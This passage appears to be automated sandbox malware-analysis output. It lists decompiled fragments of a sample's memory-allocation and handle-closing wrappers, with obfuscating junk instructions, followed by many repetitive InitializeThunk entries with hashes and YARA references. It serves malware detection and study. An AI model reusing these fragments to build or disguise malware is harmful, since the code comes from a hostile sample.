                                                    • Instruction Fuzzy Hash: 6CF05EB2605144AFDB04CF98D980CDB77BDAF8C350714864DF94DD7205C634E801CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004187CB, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 258 4187cb-41880d call 4191f0 NtAllocateVirtualMemory
                                                    C-Code - Quality: 79%
                                                    			E004187CB(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t23;

				asm("sbb [ebx-0x74aa0b80], bl");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191F0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                    0x004187cc
                                                    0x004187d3
                                                    0x004187df
                                                    0x004187e7
                                                    0x00418809
                                                    0x0041880d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 79c3af1193ff1e2b57c7f02acaddb116459a30812e5dc8473a3119e805696343
                                                    • Instruction ID: 6f6f66c420e0c48cba723085a2a6e8f894150d1d44e5b27eee268e6ee1ff7d92
                                                    • Opcode Fuzzy Hash: 79c3af1193ff1e2b57c7f02acaddb116459a30812e5dc8473a3119e805696343
                                                    • Instruction Fuzzy Hash: 85F058B5200108ABCB14CF99CC90EE77BA8AF88254F00825DFA0897241C230E814CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 261 4187d0-4187e6 262 4187ec-41880d NtAllocateVirtualMemory 261->262 263 4187e7 call 4191f0 261->263 263->262
                                                    C-Code - Quality: 100%
                                                    			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                    0x004187df
                                                    0x004187e7
                                                    0x00418809
                                                    0x0041880d

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041871A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E0041871A(void* _a4) {
				intOrPtr _v0;
				long _t8;
				void* _t11;

				_push(ds);
				asm("ror byte [ebp+0x55ca53fe], 0x8b");
				_t5 = _v0;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _v0, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a4); // executed
				return _t8;
			}






                                                    0x0041871a
                                                    0x0041871b
                                                    0x00418723
                                                    0x00418726
                                                    0x0041872f
                                                    0x00418737
                                                    0x00418745
                                                    0x00418749

                                                    APIs
                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: b2021938b182c0061c6cfed2ca3d905344e31e54a27a8be7faff85f3049b4d8d
                                                    • Instruction ID: 033e3eae8491c448c814c9b8cc424ed027314fb1eabbe8a6d0e5cdda3b8ff964
                                                    • Opcode Fuzzy Hash: b2021938b182c0061c6cfed2ca3d905344e31e54a27a8be7faff85f3049b4d8d
                                                    • Instruction Fuzzy Hash: A6E08C752002046BDB11DFA8CC88EE73F18EF88320F144299BE689B292C131A640C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                    0x00418723
                                                    0x00418726
                                                    0x0041872f
                                                    0x00418737
                                                    0x00418745
                                                    0x00418749

                                                    APIs
                                                    • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
